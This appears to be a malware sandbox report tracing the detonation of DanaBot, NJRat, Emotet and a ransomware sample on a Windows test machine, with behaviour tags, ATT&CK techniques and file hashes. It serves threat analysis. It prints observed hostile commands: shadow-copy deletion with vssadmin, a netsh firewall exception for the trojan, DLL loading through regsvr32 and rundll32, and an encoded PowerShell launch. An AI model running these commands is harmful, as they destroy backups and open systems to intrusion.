      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3316 /prefetch:2
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7088 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6620 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6996 /prefetch:8
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6940 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6964 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6416 /prefetch:8
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=180 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Users\Admin\Downloads\DanaBot.exe
      "C:\Users\Admin\Downloads\DanaBot.exe"
      - Executes dropped EXE
    [3] C:\Windows\SysWOW64\regsvr32.exe
        C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@2268
        - Loads dropped DLL
      [4] C:\Windows\SysWOW64\rundll32.exe
          C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0
          - Blocklisted process makes network request
          - Loads dropped DLL
    [3] C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 460
        - Program crash
  [2] C:\Users\Admin\Downloads\NJRat.exe
      "C:\Users\Admin\Downloads\NJRat.exe"
      - Drops startup file
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\netsh.exe
        netsh firewall add allowedprogram "C:\Users\Admin\Downloads\NJRat.exe" "NJRat.exe" ENABLE
        - Modifies Windows Firewall
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7012 /prefetch:8
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7040 /prefetch:8
  [2] C:\Users\Admin\Downloads\CoronaVirus.exe
      "C:\Users\Admin\Downloads\CoronaVirus.exe"
      - Checks computer location settings
      - Drops startup file
      - Executes dropped EXE
      - Adds Run key to start application
      - Drops desktop.ini file(s)
      - Drops file in System32 directory
      - Drops file in Program Files directory
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
      [4] C:\Windows\system32\mode.com
          mode con cp select=1251
      [4] C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          - Interacts with shadow copies
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
      [4] C:\Windows\system32\mode.com
          mode con cp select=1251
      [4] C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          - Interacts with shadow copies
    [3] C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
    [3] C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
  [2] C:\Users\Admin\Downloads\CoronaVirus.exe
      "C:\Users\Admin\Downloads\CoronaVirus.exe"
      - Executes dropped EXE
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
      - Loads dropped DLL
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
      - Checks computer location settings
      - Executes dropped EXE
      - Loads dropped DLL
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
      - Checks computer location settings
      - Executes dropped EXE
      - Loads dropped DLL
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
      - Checks computer location settings
      - Executes dropped EXE
      - Loads dropped DLL
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1760 /prefetch:1
      - Checks computer location settings
      - Executes dropped EXE
      - Loads dropped DLL
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
      - Checks computer location settings
      - Executes dropped EXE
      - Loads dropped DLL
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7208 /prefetch:12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Downloads\NJRat.exe"C:\Users\Admin\Downloads\NJRat.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\CoronaVirus.exe"C:\Users\Admin\Downloads\CoronaVirus.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2268 -ip 22681⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Emotet.zip\TheG0df2ther@Emotet.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enco 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1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\NJRat.exe"C:\Users\Admin\Downloads\NJRat.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\c657bcc7a972425bb634b1afd0ecffd5 /t 10480 /p 104881⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\c039d9e6ac92415291d3b526c2540cc4 /t 10552 /p 105601⤵
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Persistence
- Create or Modify System Process (1): Windows Service (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
Privilege Escalation
- Create or Modify System Process (1): Windows Service (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
Downloads
-
C:\Users\Admin\Downloads\Unconfirmed 2659.crdownloadFilesize
2.7MB
MD548d8f7bbb500af66baa765279ce58045
SHA12cdb5fdeee4e9c7bd2e5f744150521963487eb71
SHA256db0d72bc7d10209f7fa354ec100d57abbb9fe2e57ce72789f5f88257c5d3ebd1
SHA512aef8aa8e0d16aab35b5cc19487e53583691e4471064bc556a2ee13e94a0546b54a33995739f0fa3c4de6ff4c6abf02014aef3efb0d93ca6847bad2220c3302bd
-
C:\Users\Admin\Downloads\Unconfirmed 448430.crdownloadFilesize
31KB
MD529a37b6532a7acefa7580b826f23f6dd
SHA1a0f4f3a1c5e159b6e2dadaa6615c5e4eb762479f
SHA2567a84dd83f4f00cf0723b76a6a56587bdce6d57bd8024cc9c55565a442806cf69
SHA512a54e2b097ffdaa51d49339bd7d15d6e8770b02603e3c864a13e5945322e28eb2eebc32680c6ddddbad1d9a3001aa02e944b6cef86d4a260db7e4b50f67ac9818
-
C:\Users\Admin\Downloads\Unconfirmed 758632.crdownloadFilesize
399KB
MD5f7df29dd1008d7afa1d98e09b54f5cd7
SHA1f76500ca43f1daccd75695ca3e77e7c4063151ac
SHA25684982865370f53dcabc564e7d9c3e63903d6357874029ddb9d8570c25f507c6e
SHA512da85aaad459bb6323ced7643165e648eccf647636b99b1f59d6d4b01c863c247567aeb9bb1a7f34ed219377b0b39b8e354d5418d17293c425a71090d143aecb6
-
\??\pipe\LOCAL\crashpad_3552_FDLEEMIOZXDFKMGNMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-